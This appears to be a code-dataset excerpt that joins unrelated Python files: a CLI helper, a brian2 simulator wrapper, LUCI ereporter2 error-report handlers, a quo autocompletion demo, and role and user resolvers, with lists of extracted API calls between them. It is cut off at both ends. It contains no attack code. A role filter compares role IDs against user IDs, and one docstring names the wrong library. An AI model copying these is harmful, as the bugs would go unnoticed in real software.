'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (35034, 35041), True, 'import numpy as np\n'), ((35065, 35078), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (35071, 35078), True, 'import numpy as np\n'), ((38781, 38794), 'numpy.tan', 'np.tan', (['t1rad'], {}), '(t1rad)\n', (38787, 38794), True, 'import numpy as np\n'), ((38797, 38810), 'numpy.cos', 'np.cos', (['t2rad'], {}), '(t2rad)\n', (38803, 38810), True, 'import numpy as np\n'), ((51763, 51790), 'numpy.sqrt', 'np.sqrt', (['(B ** 2 - 4 * A * C)'], {}), '(B ** 2 - 4 * A * C)\n', (51770, 51790), True, 'import numpy as np\n'), ((55582, 55610), 'numpy.arange', 'np.arange', (['num_bins_constant'], {}), '(num_bins_constant)\n', (55591, 55610), True, 'import numpy as np\n')]
|
import argparse
import logging
LOG_FORMAT = "%(asctime)s %(name)10s %(levelname)s: %(message)s"
logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)
class Command:
"""Base class for a command"""
NAME = "<not_implemented>"
HELP = ""
DESCRIPTION = ""
def create_subparser(self, subparsers):
parser = subparsers.add_parser(
self.NAME, description=self.DESCRIPTION, help=self.HELP
)
parser.set_defaults(run=self.initialize_and_do_command)
self.add_arguments(parser)
return parser
def add_arguments(self, parser):
pass
def initialize_and_do_command(self, args):
pass
def initialize_and_run_commands(description, commands, args=None):
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(dest="command name")
subparsers.required = True
for command in commands:
command().create_subparser(subparsers)
parsed_args = parser.parse_args(args)
parsed_args.run(parsed_args)
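# Editor's sketch (not part of the original module): a minimal concrete
# Command wired through initialize_and_run_commands; the "greet" name and its
# argument are hypothetical.
class _GreetCommand(Command):
    NAME = "greet"
    HELP = "Print a greeting"
    DESCRIPTION = "Prints a greeting for the given name."

    def add_arguments(self, parser):
        parser.add_argument("name")

    def initialize_and_do_command(self, args):
        logging.getLogger(self.NAME).info("Hello, %s!", args.name)

# e.g.: initialize_and_run_commands("demo", [_GreetCommand], ["greet", "Ada"])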
|
[
"argparse.ArgumentParser",
"logging.basicConfig"
] |
[((97, 155), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': 'LOG_FORMAT'}), '(level=logging.INFO, format=LOG_FORMAT)\n', (116, 155), False, 'import logging\n'), ((753, 801), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'description'}), '(description=description)\n', (776, 801), False, 'import argparse\n')]
|
from .. import core
from .._version import __version__ # noqa: F401
from ..data_model import Simulator
import functools
import brian2
__all__ = [
'__version__',
'get_simulator_version',
'exec_sed_task',
'preprocess_sed_task',
'exec_sed_doc',
'exec_sedml_docs_in_combine_archive',
]
def get_simulator_version():
""" Get the version of pyNeuroML
Returns:
:obj:`str`: version
"""
return brian2.__version__
exec_sed_task = functools.partial(core.exec_sed_task, simulator=Simulator.brian2)
preprocess_sed_task = functools.partial(core.preprocess_sed_task, simulator=Simulator.brian2)
exec_sed_doc = functools.partial(core.exec_sed_doc, simulator=Simulator.brian2)
exec_sedml_docs_in_combine_archive = functools.partial(core.exec_sedml_docs_in_combine_archive, simulator=Simulator.brian2)
|
[
"functools.partial"
] |
[((474, 539), 'functools.partial', 'functools.partial', (['core.exec_sed_task'], {'simulator': 'Simulator.brian2'}), '(core.exec_sed_task, simulator=Simulator.brian2)\n', (491, 539), False, 'import functools\n'), ((562, 633), 'functools.partial', 'functools.partial', (['core.preprocess_sed_task'], {'simulator': 'Simulator.brian2'}), '(core.preprocess_sed_task, simulator=Simulator.brian2)\n', (579, 633), False, 'import functools\n'), ((649, 713), 'functools.partial', 'functools.partial', (['core.exec_sed_doc'], {'simulator': 'Simulator.brian2'}), '(core.exec_sed_doc, simulator=Simulator.brian2)\n', (666, 713), False, 'import functools\n'), ((751, 842), 'functools.partial', 'functools.partial', (['core.exec_sedml_docs_in_combine_archive'], {'simulator': 'Simulator.brian2'}), '(core.exec_sedml_docs_in_combine_archive, simulator=\n Simulator.brian2)\n', (768, 842), False, 'import functools\n')]
|
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""HTTP Handlers."""
import datetime
import itertools
import json
import time
import webapp2
from google.appengine.api import app_identity
from google.appengine.datastore import datastore_query
from google.appengine.ext import ndb
from components import auth
from components import decorators
from components import template
from components import utils
from . import acl
from . import logscraper
from . import models
from . import on_error
from . import ui
# Access to a protected member XXX of a client class - pylint: disable=W0212
### Admin pages.
class RestrictedEreporter2Report(auth.AuthenticatingHandler):
"""Returns all the recent errors as a web page."""
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self):
"""Reports the errors logged and ignored.
Arguments:
start: epoch time to start looking at. Defaults to the messages since the
last email.
end: epoch time to stop looking at. Defaults to now.
modules: comma separated modules to look at.
tainted: 0 or 1, specifying whether tainted versions are desired. Defaults to 1.
"""
# TODO(maruel): Be consistent about using either epoch or human readable
# formatted datetime.
end = int(float(self.request.get('end', 0)) or time.time())
start = int(
float(self.request.get('start', 0)) or
ui._get_default_start_time() or 0)
modules = self.request.get('modules')
if modules:
modules = modules.split(',')
tainted = bool(int(self.request.get('tainted', '1')))
module_versions = utils.get_module_version_list(modules, tainted)
errors, ignored, _end_time = logscraper.scrape_logs_for_errors(
start, end, module_versions)
params = {
'errors': errors,
'errors_count': sum(len(e.events) for e in errors),
'errors_version_count':
len(set(itertools.chain.from_iterable(e.versions for e in errors))),
'ignored': ignored,
'ignored_count': sum(len(i.events) for i in ignored),
'ignored_version_count':
len(set(itertools.chain.from_iterable(i.versions for i in ignored))),
'xsrf_token': self.generate_xsrf_token(),
}
params.update(ui._get_template_env(start, end, module_versions))
self.response.write(template.render('ereporter2/requests.html', params))
class RestrictedEreporter2Request(auth.AuthenticatingHandler):
"""Dumps information about single logged request."""
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self, request_id):
data = logscraper._log_request_id(request_id)
if not data:
self.abort(404, detail='Request id was not found.')
self.response.write(
template.render('ereporter2/request.html', {'request': data}))
class RestrictedEreporter2ErrorsList(auth.AuthenticatingHandler):
"""Dumps information about reported client side errors."""
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self):
limit = int(self.request.get('limit', 100))
cursor = datastore_query.Cursor(urlsafe=self.request.get('cursor'))
errors_found, cursor, more = models.Error.query().order(
-models.Error.created_ts).fetch_page(limit, start_cursor=cursor)
params = {
'cursor': cursor.urlsafe() if cursor and more else None,
'errors': errors_found,
'limit': limit,
'now': utils.utcnow(),
}
self.response.out.write(template.render('ereporter2/errors.html', params))
class RestrictedEreporter2Error(auth.AuthenticatingHandler):
"""Dumps information about reported client side errors."""
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self, error_id):
error = models.Error.get_by_id(int(error_id))
if not error:
self.abort(404, 'Error not found')
params = {
'error': error,
'now': utils.utcnow(),
}
self.response.out.write(template.render('ereporter2/error.html', params))
class RestrictedEreporter2Silence(auth.AuthenticatingHandler):
@auth.autologin
@auth.require(acl.is_ereporter2_viewer)
def get(self):
# Due to historical reasons where created_ts had indexed=False, do not use
# .order(models.ErrorReportingMonitoring.created_ts) yet. Fix this once all
# objects have been updated.
items = models.ErrorReportingMonitoring.query().fetch()
items.sort(key=lambda x: x.created_ts)
params = {
'silenced': items,
'xsrf_token': self.generate_xsrf_token(),
}
self.response.out.write(template.render('ereporter2/silence.html', params))
@auth.require(acl.is_ereporter2_editor)
def post(self):
to_delete = self.request.get('to_delete')
if to_delete:
ndb.Key(models.ErrorReportingMonitoring, to_delete).delete()
else:
mute_type = self.request.get('mute_type')
error = None
if mute_type in ('exception_type', 'signature'):
error = self.request.get(mute_type)
if not error:
self.abort(400)
silenced = self.request.get('silenced')
silenced_until = self.request.get('silenced_until')
if silenced_until == 'T':
silenced_until = ''
threshold = self.request.get('threshold')
key = models.ErrorReportingMonitoring.error_to_key(error)
if not silenced and not silenced_until and not threshold:
key.delete()
else:
item = models.ErrorReportingMonitoring(key=key, error=error)
if silenced:
item.silenced = True
if silenced_until:
item.silenced_until = datetime.datetime.strptime(
silenced_until, '%Y-%m-%dT%H:%M')
if threshold:
item.threshold = int(threshold)
item.put()
self.get()
### Cron jobs.
class CronEreporter2Mail(webapp2.RequestHandler):
"""Generate and emails an exception report."""
@decorators.require_cronjob
def get(self):
"""Sends email(s) containing the errors logged."""
# Do not use self.request.host_url because it will be http:// and will point
# to the backend, with an host format that breaks the SSL certificate.
# TODO(maruel): On the other hand, Google Apps instances are not hosted on
# appspot.com.
host_url = 'https://%s.appspot.com' % app_identity.get_application_id()
request_id_url = host_url + '/restricted/ereporter2/request/'
report_url = host_url + '/restricted/ereporter2/report'
recipients = self.request.get('recipients', acl.get_ereporter2_recipients())
result = ui._generate_and_email_report(
utils.get_module_version_list(None, False),
recipients,
request_id_url,
report_url,
{})
self.response.headers['Content-Type'] = 'text/plain; charset=utf-8'
if result:
self.response.write('Success.')
else:
# Do not HTTP 500 since we do not want it to be retried.
self.response.write('Failed.')
class CronEreporter2Cleanup(webapp2.RequestHandler):
"""Deletes old error reports."""
@decorators.require_cronjob
def get(self):
old_cutoff = utils.utcnow() - on_error.ERROR_TIME_TO_LIVE
items = models.Error.query(
models.Error.created_ts < old_cutoff,
default_options=ndb.QueryOptions(keys_only=True))
out = len(ndb.delete_multi(items))
self.response.headers['Content-Type'] = 'text/plain; charset=utf-8'
self.response.write(str(out))
### Public API.
class OnErrorHandler(auth.AuthenticatingHandler):
"""Adds an error report.
This one is open so errors like authentication reports are logged in too.
This means we could get spammed a lot about it. Implement DDoS protection by
rate limiting once a kid figures it out.
"""
xsrf_token_enforce_on = ()
# TODO(maruel): This was copied from ../../auth/ui/rest_api.py and needs to be
# factored out.
def parse_body(self):
"""Parse JSON body and verifies it's a dict."""
expected = ('application/json', 'application/json; charset=utf-8')
if self.request.headers.get('Content-Type').lower() not in expected:
msg = 'Expecting JSON body with content type \'application/json\''
self.abort(400, msg)
try:
body = json.loads(self.request.body)
if not isinstance(body, dict):
raise ValueError()
except ValueError:
self.abort(400, 'Not a valid json dict body')
return body
@auth.public
def post(self):
body = self.parse_body()
version = body.get('v')
# Do not enforce version for now, just assert it is present.
if not version:
self.abort(400, 'Missing version')
report = body.get('r')
if not report:
self.abort(400, 'Missing report')
kwargs = dict(
(k, report[k]) for k in on_error.VALID_ERROR_KEYS if report.get(k))
report_id = on_error.log_request(self.request, add_params=False, **kwargs)
self.response.headers['Content-Type'] = 'application/json; charset=utf-8'
body = {
'id': report_id,
'url':
'%s/restricted/ereporter2/errors/%d' %
(self.request.host_url, report_id),
}
self.response.write(utils.encode_to_json(body))
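# Editor's note (illustrative, not part of the original handlers): a minimal
# valid payload for POST /ereporter2/api/v1/on_error, derived from the checks
# above. The keys inside 'r' shown here are hypothetical members of
# on_error.VALID_ERROR_KEYS; anything not in that whitelist is dropped.
#
#   {"v": "1", "r": {"message": "Uncaught TypeError", "source": "client"}}
#
# The response echoes the stored report id plus a link to its
# /restricted/ereporter2/errors/<id> page.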
def get_frontend_routes():
return [
webapp2.Route(
r'/restricted/ereporter2/errors',
RestrictedEreporter2ErrorsList),
webapp2.Route(
r'/restricted/ereporter2/errors/<error_id:\d+>',
RestrictedEreporter2Error),
webapp2.Route(
r'/restricted/ereporter2/report',
RestrictedEreporter2Report),
webapp2.Route(
r'/restricted/ereporter2/request/<request_id:[0-9a-fA-F]+>',
RestrictedEreporter2Request),
webapp2.Route(
r'/restricted/ereporter2/silence',
RestrictedEreporter2Silence),
# Public API.
webapp2.Route(
'/ereporter2/api/v1/on_error', OnErrorHandler),
]
def get_backend_routes():
# This requires a cron job to this URL.
return [
webapp2.Route(
r'/internal/cron/ereporter2/cleanup', CronEreporter2Cleanup),
webapp2.Route(
r'/internal/cron/ereporter2/mail', CronEreporter2Mail),
]
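# A minimal cron.yaml sketch wiring up the backend routes above (the schedule
# values are assumptions, not from the original project):
# cron:
# - url: /internal/cron/ereporter2/mail
#   schedule: every day 09:00
# - url: /internal/cron/ereporter2/cleanup
#   schedule: every day 04:00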
|
[
"itertools.chain.from_iterable",
"components.template.render",
"google.appengine.api.app_identity.get_application_id",
"json.loads",
"components.utils.utcnow",
"components.auth.require",
"time.time",
"components.utils.encode_to_json",
"datetime.datetime.strptime",
"google.appengine.ext.ndb.delete_multi",
"google.appengine.ext.ndb.QueryOptions",
"webapp2.Route",
"google.appengine.ext.ndb.Key",
"components.utils.get_module_version_list"
] |
[((874, 912), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (886, 912), False, 'from components import auth\n'), ((2640, 2678), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (2652, 2678), False, 'from components import auth\n'), ((3080, 3118), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (3092, 3118), False, 'from components import auth\n'), ((3780, 3818), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (3792, 3818), False, 'from components import auth\n'), ((4191, 4229), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_viewer'], {}), '(acl.is_ereporter2_viewer)\n', (4203, 4229), False, 'from components import auth\n'), ((4721, 4759), 'components.auth.require', 'auth.require', (['acl.is_ereporter2_editor'], {}), '(acl.is_ereporter2_editor)\n', (4733, 4759), False, 'from components import auth\n'), ((1741, 1788), 'components.utils.get_module_version_list', 'utils.get_module_version_list', (['modules', 'tainted'], {}), '(modules, tainted)\n', (1770, 1788), False, 'from components import utils\n'), ((9259, 9337), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/errors"""', 'RestrictedEreporter2ErrorsList'], {}), "('/restricted/ereporter2/errors', RestrictedEreporter2ErrorsList)\n", (9272, 9337), False, 'import webapp2\n'), ((9361, 9454), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/errors/<error_id:\\\\d+>"""', 'RestrictedEreporter2Error'], {}), "('/restricted/ereporter2/errors/<error_id:\\\\d+>',\n RestrictedEreporter2Error)\n", (9374, 9454), False, 'import webapp2\n'), ((9473, 9547), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/report"""', 'RestrictedEreporter2Report'], {}), "('/restricted/ereporter2/report', RestrictedEreporter2Report)\n", (9486, 9547), False, 'import webapp2\n'), ((9571, 9677), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/request/<request_id:[0-9a-fA-F]+>"""', 'RestrictedEreporter2Request'], {}), "('/restricted/ereporter2/request/<request_id:[0-9a-fA-F]+>',\n RestrictedEreporter2Request)\n", (9584, 9677), False, 'import webapp2\n'), ((9697, 9773), 'webapp2.Route', 'webapp2.Route', (['"""/restricted/ereporter2/silence"""', 'RestrictedEreporter2Silence'], {}), "('/restricted/ereporter2/silence', RestrictedEreporter2Silence)\n", (9710, 9773), False, 'import webapp2\n'), ((9816, 9876), 'webapp2.Route', 'webapp2.Route', (['"""/ereporter2/api/v1/on_error"""', 'OnErrorHandler'], {}), "('/ereporter2/api/v1/on_error', OnErrorHandler)\n", (9829, 9876), False, 'import webapp2\n'), ((9974, 10047), 'webapp2.Route', 'webapp2.Route', (['"""/internal/cron/ereporter2/cleanup"""', 'CronEreporter2Cleanup'], {}), "('/internal/cron/ereporter2/cleanup', CronEreporter2Cleanup)\n", (9987, 10047), False, 'import webapp2\n'), ((10063, 10130), 'webapp2.Route', 'webapp2.Route', (['"""/internal/cron/ereporter2/mail"""', 'CronEreporter2Mail'], {}), "('/internal/cron/ereporter2/mail', CronEreporter2Mail)\n", (10076, 10130), False, 'import webapp2\n'), ((2445, 2496), 'components.template.render', 'template.render', (['"""ereporter2/requests.html"""', 'params'], {}), "('ereporter2/requests.html', params)\n", (2460, 2496), False, 'from components import template\n'), ((2866, 2927), 'components.template.render', 'template.render', (['"""ereporter2/request.html"""', 
"{'request': data}"], {}), "('ereporter2/request.html', {'request': data})\n", (2881, 2927), False, 'from components import template\n'), ((3533, 3547), 'components.utils.utcnow', 'utils.utcnow', ([], {}), '()\n', (3545, 3547), False, 'from components import utils\n'), ((3583, 3632), 'components.template.render', 'template.render', (['"""ereporter2/errors.html"""', 'params'], {}), "('ereporter2/errors.html', params)\n", (3598, 3632), False, 'from components import template\n'), ((4005, 4019), 'components.utils.utcnow', 'utils.utcnow', ([], {}), '()\n', (4017, 4019), False, 'from components import utils\n'), ((4055, 4103), 'components.template.render', 'template.render', (['"""ereporter2/error.html"""', 'params'], {}), "('ereporter2/error.html', params)\n", (4070, 4103), False, 'from components import template\n'), ((4665, 4715), 'components.template.render', 'template.render', (['"""ereporter2/silence.html"""', 'params'], {}), "('ereporter2/silence.html', params)\n", (4680, 4715), False, 'from components import template\n'), ((6373, 6406), 'google.appengine.api.app_identity.get_application_id', 'app_identity.get_application_id', ([], {}), '()\n', (6404, 6406), False, 'from google.appengine.api import app_identity\n'), ((6666, 6708), 'components.utils.get_module_version_list', 'utils.get_module_version_list', (['None', '(False)'], {}), '(None, False)\n', (6695, 6708), False, 'from components import utils\n'), ((7175, 7189), 'components.utils.utcnow', 'utils.utcnow', ([], {}), '()\n', (7187, 7189), False, 'from components import utils\n'), ((7370, 7393), 'google.appengine.ext.ndb.delete_multi', 'ndb.delete_multi', (['items'], {}), '(items)\n', (7386, 7393), False, 'from google.appengine.ext import ndb\n'), ((8271, 8300), 'json.loads', 'json.loads', (['self.request.body'], {}), '(self.request.body)\n', (8281, 8300), False, 'import json\n'), ((9187, 9213), 'components.utils.encode_to_json', 'utils.encode_to_json', (['body'], {}), '(body)\n', (9207, 9213), False, 'from components import utils\n'), ((1448, 1459), 'time.time', 'time.time', ([], {}), '()\n', (1457, 1459), False, 'import time\n'), ((7322, 7354), 'google.appengine.ext.ndb.QueryOptions', 'ndb.QueryOptions', ([], {'keys_only': '(True)'}), '(keys_only=True)\n', (7338, 7354), False, 'from google.appengine.ext import ndb\n'), ((2040, 2097), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['(e.versions for e in errors)'], {}), '(e.versions for e in errors)\n', (2069, 2097), False, 'import itertools\n'), ((2236, 2294), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['(i.versions for i in ignored)'], {}), '(i.versions for i in ignored)\n', (2265, 2294), False, 'import itertools\n'), ((4848, 4899), 'google.appengine.ext.ndb.Key', 'ndb.Key', (['models.ErrorReportingMonitoring', 'to_delete'], {}), '(models.ErrorReportingMonitoring, to_delete)\n', (4855, 4899), False, 'from google.appengine.ext import ndb\n'), ((5682, 5742), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['silenced_until', '"""%Y-%m-%dT%H:%M"""'], {}), "(silenced_until, '%Y-%m-%dT%H:%M')\n", (5708, 5742), False, 'import datetime\n')]
|
#!/usr/bin/env python
"""
Autocompletion example that shows meta-information alongside the completions.
"""
from quo.completion import WordCompleter
from quo.prompt import Prompt
animal_completer = WordCompleter(
[
"alligator",
"ant",
"ape",
"bat",
"bear",
"beaver",
"bee",
"bison",
"butterfly",
"cat",
"chicken",
"crocodile",
"dinosaur",
"dog",
"dolphin",
"dove",
"duck",
"eagle",
"elephant",
],
meta_dict={
"alligator": "An alligator is a crocodilian in the genus Alligator of the family Alligatoridae.",
"ant": "Ants are eusocial insects of the family Formicidae",
"ape": "Apes (Hominoidea) are a branch of Old World tailless anthropoid catarrhine primates ",
"bat": "Bats are mammals of the order Chiroptera",
}
)
session = Prompt(
completer=animal_completer,
complete_style="multi_column"
)
def main():
text = session.prompt("Give some animals: ")
print("You said: %s" % text)
if __name__ == "__main__":
main()
|
[
"quo.completion.WordCompleter",
"quo.prompt.Prompt"
] |
[((201, 738), 'quo.completion.WordCompleter', 'WordCompleter', (["['alligator', 'ant', 'ape', 'bat', 'bear', 'beaver', 'bee', 'bison',\n 'butterfly', 'cat', 'chicken', 'crocodile', 'dinosaur', 'dog',\n 'dolphin', 'dove', 'duck', 'eagle', 'elephant']"], {'meta_dict': "{'alligator':\n 'An alligator is a crocodilian in the genus Alligator of the family Alligatoridae.'\n , 'ant': 'Ants are eusocial insects of the family Formicidae', 'ape':\n 'Apes (Hominoidea) are a branch of Old World tailless anthropoid catarrhine primates '\n , 'bat': 'Bats are mammals of the order Chiroptera'}"}), "(['alligator', 'ant', 'ape', 'bat', 'bear', 'beaver', 'bee',\n 'bison', 'butterfly', 'cat', 'chicken', 'crocodile', 'dinosaur', 'dog',\n 'dolphin', 'dove', 'duck', 'eagle', 'elephant'], meta_dict={'alligator':\n 'An alligator is a crocodilian in the genus Alligator of the family Alligatoridae.'\n , 'ant': 'Ants are eusocial insects of the family Formicidae', 'ape':\n 'Apes (Hominoidea) are a branch of Old World tailless anthropoid catarrhine primates '\n , 'bat': 'Bats are mammals of the order Chiroptera'})\n", (214, 738), False, 'from quo.completion import WordCompleter\n'), ((933, 998), 'quo.prompt.Prompt', 'Prompt', ([], {'completer': 'animal_completer', 'complete_style': '"""multi_column"""'}), "(completer=animal_completer, complete_style='multi_column')\n", (939, 998), False, 'from quo.prompt import Prompt\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
from importlib.util import find_spec
from importlib import import_module
from silvaengine_utility import Utility
from jose import jwk, jwt
from .types import (
RoleType as OutputRoleType,
RolesType,
CertificateType,
UserRelationshipType,
SimilarUserType,
SimilarUsersType,
RoleDetectionType,
)
from .models import RelationshipModel, RoleModel, RoleType
from .handlers import _get_user_permissions
import boto3, os, hmac, hashlib, base64, json
# @TODO: Apply status check
def _resolve_roles(info, **kwargs):
try:
arguments = {
"limit": int(
kwargs.get(
"page_size",
info.context.get("setting", {}).get("max_size_per_page", 10),
)
),
"last_evaluated_key": None,
"filter_condition": None,
}
total = 0
# Build filter conditions.
# @SEE: {"ARGUMENT_NAME": "FIELD_NAME_OF_DATABASE_TABLE", ...}
mappings = {
"is_admin": "is_admin",
"name": "name",
"role_description": "description",
"role_type": "type",
"status": "status",
}
filter_conditions = []
# Get filter condition from arguments
# @TODO: If there is an operation such as `is_in`, this method or mapping must be extended.
for argument, field in mappings.items():
if kwargs.get(argument) is None or not hasattr(RoleModel, field):
continue
if field == "name":
filter_conditions.append(
(
getattr(RoleModel, field).contains(
str(kwargs.get(argument)).strip()
)
)
)
else:
filter_conditions.append(
(getattr(RoleModel, field) == kwargs.get(argument))
)
if kwargs.get("user_ids"):
role_ids = [
str(relationship.role_id).strip()
for relationship in RelationshipModel.scan(
RelationshipModel.role_id.is_in(*list(set(kwargs.get("user_ids"))))
)
]
if len(role_ids):
filter_conditions.append((RoleModel.role_id.is_in(*role_ids)))
if len(filter_conditions):
arguments["filter_condition"] = filter_conditions.pop(0)
for condition in filter_conditions:
arguments["filter_condition"] = (
arguments.get("filter_condition") & condition
)
# Count total of roles
for _ in RoleModel.scan(filter_condition=arguments.get("filter_condition")):
total += 1
# Pagination.
if arguments.get("limit") > 0 and kwargs.get("page_number", 0) > 1:
pagination_arguments = {
"limit": (int(kwargs.get("page_number", 0)) - 1)
* arguments.get("limit"),
"last_evaluated_key": None,
"filter_condition": arguments.get("filter_condition"),
}
# Skip (int(kwargs.get("page_number", 0)) - 1) rows
pagination_results = RoleModel.scan(**pagination_arguments)
# Discard the results of the iteration, and extract the cursor of the page offset from the iterator.
_ = [role for role in pagination_results]
# The iterator needs to be traversed first, and then the pagination cursor can be obtained through `last_evaluated_key` after the traversal is completed.
arguments["last_evaluated_key"] = pagination_results.last_evaluated_key
if (
arguments.get("last_evaluated_key") is None
or pagination_results.total_count == total
):
return None
# Query role form database.
results = RoleModel.scan(**arguments)
roles = [
OutputRoleType(
**Utility.json_loads(
Utility.json_dumps(dict(**role.__dict__["attribute_values"]))
)
)
for role in results
]
if results.total_count < 1:
return None
return RolesType(
items=roles,
page_number=kwargs.get("page_number", 1),
page_size=arguments.get("limit"),
total=total,
)
except Exception as e:
raise e
# @TODO: Apply status check
# Query users by relationship.
def _resolve_users(info, **kwargs):
try:
arguments = {
"limit": int(
kwargs.get(
"page_size",
info.context.get("setting", {}).get("max_size_per_page", 10),
)
),
"last_evaluated_key": None,
"filter_condition": None,
}
total = 0
# Build filter conditions.
# @SEE: {"ARGUMENT_NAME": "FIELD_NAME_OF_DATABASE_TABLE", ...}
# Role model
role_field_argument_mappings_eq = {
"role_status": "status",
"is_admin_role": "is_admin",
}
role_field_argument_mappings_in = {
"role_type": "type",
"role_name": "name",
"role_id": "role_id",
}
role_filter_conditions = []
# eq: Get filter condition from arguments for Roles
for argument, field in role_field_argument_mappings_eq.items():
if kwargs.get(argument) is None or not hasattr(RoleModel, field):
continue
role_filter_conditions.append(
(getattr(RoleModel, field) == kwargs.get(argument))
)
# in: Get filter condition from arguments for Roles
for argument, field in role_field_argument_mappings_in.items():
if (
not hasattr(RoleModel, field)
or type(kwargs.get(argument)) is not list
or len(kwargs.get(argument, [])) < 1
):
continue
role_filter_conditions.append(
(getattr(RoleModel, field).is_in(*kwargs.get(argument)))
)
# Join the filter conditions
if len(role_filter_conditions):
arguments["filter_condition"] = role_filter_conditions.pop(0)
for condition in role_filter_conditions:
arguments["filter_condition"] = (
arguments["filter_condition"] & condition
)
# Pagination.
if arguments.get("limit") > 0 and kwargs.get("page_number", 0) > 1:
pagination_arguments = {
"limit": (int(kwargs.get("page_number", 0)) - 1)
* arguments.get("limit"),
"last_evaluated_key": None,
"filter_condition": arguments["filter_condition"],
}
# Skip (int(kwargs.get("page_number", 0)) - 1) rows
pagination_results = RoleModel.scan(**pagination_arguments)
# Discard the results of the iteration, and extract the cursor of the page offset from the iterator.
_ = [role for role in pagination_results]
arguments["last_evaluated_key"] = pagination_results.last_evaluated_key
if (
arguments.get("last_evaluated_key") is None
or pagination_results.total_count == total
):
return None
# Count total of roles
roles = {}
for role in RoleModel.scan(**arguments):
if role:
roles[role.role_id] = SimilarUserType(
users=[],
**Utility.json_loads(
Utility.json_dumps(dict(**role.__dict__["attribute_values"]))
)
)
total += 1
if (
kwargs.get("role_id") and roles.get(kwargs.get("role_id")) is None
) or total == 0:
return None
relationship_filter_conditions = [
(RelationshipModel.role_id.is_in(*roles.keys()))
]
# Relationship model
relationship_field_argument_mappings_eq = {
"relationship_status": "status",
"relationship_type": "type",
}
relationship_field_argument_mappings_in = {
"owner_id": "group_id",
}
# eq: Get filter condition from arguments
for argument, field in relationship_field_argument_mappings_eq.items():
if kwargs.get(argument) is None or not hasattr(RelationshipModel, field):
continue
relationship_filter_conditions.append(
(getattr(RelationshipModel, field) == kwargs.get(argument))
)
# in: Get filter condition from arguments
for argument, field in relationship_field_argument_mappings_in.items():
if (
not hasattr(RelationshipModel, field)
or type(kwargs.get(argument)) is not list
or len(kwargs.get(argument, [])) < 1
):
continue
relationship_filter_conditions.append(
(getattr(RelationshipModel, field).is_in(*kwargs.get(argument)))
)
# Join the filter conditions
filter_condition = None
if len(relationship_filter_conditions):
filter_condition = relationship_filter_conditions.pop(0)
for condition in relationship_filter_conditions:
filter_condition = filter_condition & condition
# Query data from the database.
results = RelationshipModel.scan(filter_condition=filter_condition)
relationships = [
UserRelationshipType(
**Utility.json_loads(
Utility.json_dumps(
dict(**relationship.__dict__["attribute_values"])
)
)
)
for relationship in results
]
if results.total_count < 1:
return None
hooks = (
[
hook.strip()
for hook in info.context.get("setting", {})
.get("custom_hooks", "")
.split(",")
]
if info.context.get("setting", {}).get("custom_hooks")
else []
)
if len(hooks):
logger = info.context.get("logger")
for hook in hooks:
fragments = hook.split(":", 3)
if len(fragments) < 3:
for _ in range(3 - len(fragments)):
fragments.append(None)
elif len(fragments) > 3:
fragments = fragments[0:3]
module_name, class_name, function_name = fragments
fn = Utility.import_dynamically(
module_name, function_name, class_name, {"logger": logger}
)
if fn is None:
continue
users = fn(
list(set([relationship.user_id for relationship in relationships]))
)
if len(users):
for relationship in relationships:
user_ids = list(
set(
[
# user.cognito_user_sub
str(user["id"])
for user in roles[
str(relationship.role_id).strip()
].users
# if hasattr(user, "cognito_user_sub")
if ("id" in user)
]
)
)
if (
relationship.role_id
and roles.get(str(relationship.role_id).strip())
and relationship.user_id
and users.get(str(relationship.user_id).strip())
and str(relationship.user_id).strip() not in user_ids
):
roles[str(relationship.role_id).strip()].users.append(
users.get(str(relationship.user_id).strip())
)
# items.append(relationship)
# relationships = items
return SimilarUsersType(
items=roles.values(),
page_number=kwargs.get("page_number", 1),
page_size=arguments.get("limit"),
total=total,
)
except Exception as e:
raise e
# Query role info by specified ID.
def _resolve_role(info, **kwargs):
role = RoleModel.get(kwargs.get("role_id"))
return OutputRoleType(
**Utility.json_loads(Utility.json_dumps(role.__dict__["attribute_values"]))
)
# Login
def _resolve_certificate(info, **kwargs):
try:
username = kwargs.get("username")
password = kwargs.get("password")
assert username and password, "Username and password are required"
settings = info.context.get("setting", {})
region_name = (
settings.get("region_name")
if settings.get("region_name")
else os.getenv("REGIONNAME")
)
aws_access_key_id = (
settings.get("aws_access_key_id")
if settings.get("aws_access_key_id")
else os.getenv("aws_access_key_id")
)
aws_secret_access_key = (
settings.get("aws_secret_access_key")
if settings.get("aws_secret_access_key")
else os.getenv("aws_secret_access_key")
)
app_client_id = (
settings.get("app_client_id")
if settings.get("app_client_id")
else os.getenv("app_client_id")
)
app_client_secret = (
settings.get("app_client_secret")
if settings.get("app_client_secret")
else os.getenv("app_client_secret")
)
if (
not region_name
or not aws_access_key_id
or not aws_secret_access_key
or not app_client_id
or not app_client_secret
):
raise Exception("Missing required configuration", 400)
cognitoIdp = boto3.client(
"cognito-idp",
region_name=region_name,
